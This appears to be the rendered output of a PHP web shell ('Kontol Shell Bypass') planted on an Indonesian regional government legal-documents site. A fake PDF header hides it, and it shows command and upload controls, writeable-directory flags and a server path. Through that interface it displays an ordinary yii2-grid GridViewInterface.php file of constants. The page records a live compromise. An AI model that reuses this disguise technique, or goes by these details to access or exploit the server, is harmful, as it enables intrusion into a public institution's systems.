%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /www/wwwroot/jdih.dprd.mukomukokab.go.id/vendor/kartik-v/yii2-grid/src/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /www/wwwroot/jdih.dprd.mukomukokab.go.id/vendor/kartik-v/yii2-grid/src/GridViewInterface.php
<?php

/**
 * @package   yii2-grid
 * @author    Kartik Visweswaran <kartikv2@gmail.com>
 * @copyright Copyright &copy; Kartik Visweswaran, Krajee.com, 2014 - 2023
 * @version   3.5.1
 */

namespace kartik\grid;

/**
 * The Krajee GridView interface
 *
 * @see http://demos.krajee.com/grid
 * @author Kartik Visweswaran <kartikv2@gmail.com>
 * @since  1.0
 */
interface GridViewInterface
{
    /**
     * the top part of the table after the header (used for location of the page summary row)
     */
    const POS_TOP = 'top';

    /**
     * the bottom part of the table before the footer (used for location of the page summary row)
     */
    const POS_BOTTOM = 'bottom';

    /**
     * the **default** bootstrap contextual color type (applicable only for panel contextual style)
     */
    const TYPE_DEFAULT = 'default';

    /**
     * the **light** bootstrap contextual color type (applicable only for panel contextual style)
     */
    const TYPE_LIGHT = 'light';

    /**
     * the **dark** bootstrap contextual color type (applicable only for panel contextual style)
     */
    const TYPE_DARK = 'dark';

    /**
     * the **secondary** bootstrap contextual color type
     */
    const TYPE_SECONDARY = 'secondary';

    /**
     * the **primary** bootstrap contextual color type
     */
    const TYPE_PRIMARY = 'primary';

    /**
     * the **information** bootstrap contextual color type
     */
    const TYPE_INFO = 'info';

    /**
     * the **danger** bootstrap contextual color type
     */
    const TYPE_DANGER = 'danger';

    /**
     * the **warning** bootstrap contextual color type
     */
    const TYPE_WARNING = 'warning';

    /**
     * the **success** bootstrap contextual color type
     */
    const TYPE_SUCCESS = 'success';

    /**
     * the **active** bootstrap contextual color type (applicable only for table row contextual style)
     */
    const TYPE_ACTIVE = 'active';

    /**
     * the Bootstrap 3.x **active** icon markup for [[BooleanColumn]]
     */
    const ICON_ACTIVE = '<span class="glyphicon glyphicon-ok-sign text-success" style="font-weight:bold"></span>';

    /**
     * the **inactive** icon markup for [[BooleanColumn]]
     */
    const ICON_INACTIVE = '<span class="glyphicon glyphicon-remove-sign text-danger" style="font-weight:bold"></span>';

    /**
     * the Bootstrap 3.x **expanded** icon markup for [[ExpandRowColumn]]
     */
    const ICON_EXPAND = '<span class="glyphicon glyphicon-expand"></span>';

    /**
     * the Bootstrap 3.x **collapsed** icon markup for [[ExpandRowColumn]]
     */
    const ICON_COLLAPSE = '<span class="glyphicon glyphicon-collapse-down"></span>';

    /**
     * the Bootstrap 4.x / 5.x **active** icon markup for [[BooleanColumn]]
     */
    const ICON_ACTIVE_BS4 = '<span class="fas fa-check-circle text-success"></span>';

    /**
     * the Bootstrap 4.x / 5.x **inactive** icon markup for [[BooleanColumn]]
     */
    const ICON_INACTIVE_BS4 = '<span class="fas fa-times-circle text-danger"></span>';

    /**
     * the Bootstrap 4.x / 5.x **expanded** icon markup for [[ExpandRowColumn]]
     */
    const ICON_EXPAND_BS4 = '<span class="far fa-plus-square"></span>';

    /**
     * the Bootstrap 4.x / 5.x **collapsed** icon markup for [[ExpandRowColumn]]
     */
    const ICON_COLLAPSE_BS4 = '<span class="far fa-minus-square"></span>';

    /**
     * the status for a **default** row in [[ExpandRowColumn]]
     */
    const ROW_NONE = -1;

    /**
     * the status for an **expanded** row in [[ExpandRowColumn]]
     */
    const ROW_EXPANDED = 0;

    /**
     * the status for a **collapsed** row in [[ExpandRowColumn]]
     */
    const ROW_COLLAPSED = 1;
    /**
     * horizontal **right** alignment for grid cells
     */
    const ALIGN_RIGHT = 'right';

    /**
     * horizontal **center** alignment for grid cells
     */
    const ALIGN_CENTER = 'center';

    /**
     * horizontal **left** alignment for grid cells
     */
    const ALIGN_LEFT = 'left';

    /**
     * vertical **top** alignment for grid cells
     */
    const ALIGN_TOP = 'top';

    /**
     * vertical **middle** alignment for grid cells
     */
    const ALIGN_MIDDLE = 'middle';

    /**
     * vertical **bottom** alignment for grid cells
     */
    const ALIGN_BOTTOM = 'bottom';

    /**
     * CSS to apply to prevent wrapping of grid cell data
     */
    const NOWRAP = 'kv-nowrap';

    /**
     * grid filter input type for [[Html::checkbox]]
     */
    const FILTER_CHECKBOX = 'checkbox';

    /**
     * grid filter input type for [[Html::radio]]
     */
    const FILTER_RADIO = 'radio';

    /**
     * grid filter input type for [[\kartik\select2\Select2]] widget
     */
    const FILTER_SELECT2 = '\kartik\select2\Select2';

    /**
     * grid filter input type for [[\kartik\typeahead\Typeahead]] widget
     */
    const FILTER_TYPEAHEAD = '\kartik\typeahead\Typeahead';

    /**
     * grid filter input type for [[\kartik\switchinput\SwitchInput]] widget
     */
    const FILTER_SWITCH = '\kartik\switchinput\SwitchInput';

    /**
     * grid filter input type for [[\kartik\touchspin\TouchSpin]] widget
     */
    const FILTER_SPIN = '\kartik\touchspin\TouchSpin';

    /**
     * grid filter input type for [[\kartik\rating\StarRating]] widget
     */
    const FILTER_STAR = '\kartik\rating\StarRating';

    /**
     * grid filter input type for [[\kartik\date\DatePicker]] widget
     */
    const FILTER_DATE = '\kartik\date\DatePicker';

    /**
     * grid filter input type for [[\kartik\time\TimePicker]] widget
     */
    const FILTER_TIME = '\kartik\time\TimePicker';

    /**
     * grid filter input type for [[\kartik\datetime\DateTimePicker]] widget
     */
    const FILTER_DATETIME = '\kartik\datetime\DateTimePicker';

    /**
     * grid filter input type for [[\kartik\daterange\DateRangePicker]] widget
     */
    const FILTER_DATE_RANGE = '\kartik\daterange\DateRangePicker';

    /**
     * grid filter input type for [[\kartik\sortinput\SortableInput]] widget
     */
    const FILTER_SORTABLE = '\kartik\sortinput\SortableInput';

    /**
     * grid filter input type for [[\kartik\range\RangeInput]] widget
     */
    const FILTER_RANGE = '\kartik\range\RangeInput';

    /**
     * grid filter input type for [[\kartik\color\ColorInput]] widget
     */
    const FILTER_COLOR = '\kartik\color\ColorInput';

    /**
     * grid filter input type for [[\kartik\slider\Slider]] widget
     */
    const FILTER_SLIDER = '\kartik\slider\Slider';

    /**
     * grid filter input type for [[\kartik\money\MaskMoney]] widget
     */
    const FILTER_MONEY = '\kartik\money\MaskMoney';

    /**
     * grid filter input type for [[\kartik\number\NumberControl]] widget
     */
    const FILTER_NUMBER = '\kartik\number\NumberControl';

    /**
     * grid filter input type for [[\kartik\checkbox\CheckboxX]] widget
     */
    const FILTER_CHECKBOX_X = '\kartik\checkbox\CheckboxX';

    /**
     * identifier for the `COUNT` summary function
     */
    const F_COUNT = 'f_count';

    /**
     * identifier for the `SUM` summary function
     */
    const F_SUM = 'f_sum';
    /**
     * identifier for the `MAX` summary function
     */
    const F_MAX = 'f_max';

    /**
     * identifier for the `MIN` summary function
     */
    const F_MIN = 'f_min';

    /**
     * identifier for the `AVG` summary function
     */
    const F_AVG = 'f_avg';

    /**
     * HTML (Hyper Text Markup Language) export format
     */
    const HTML = 'html';

    /**
     * CSV (comma separated values) export format
     */
    const CSV = 'csv';

    /**
     * Text export format
     */
    const TEXT = 'txt';

    /**
     * Microsoft Excel 95+ export format
     */
    const EXCEL = 'xls';

    /**
     * PDF (Portable Document Format) export format
     */
    const PDF = 'pdf';

    /**
     * JSON (Javascript Object Notation) export format
     */
    const JSON = 'json';

    /**
     * set download target for grid export to a popup browser window
     */
    const TARGET_POPUP = '_popup';

    /**
     * set download target for grid export to the same open document on the browser
     */
    const TARGET_SELF = '_self';

    /**
     * set download target for grid export to a new window that auto closes after download
     */
    const TARGET_BLANK = '_blank';
}

Kontol Shell Bypass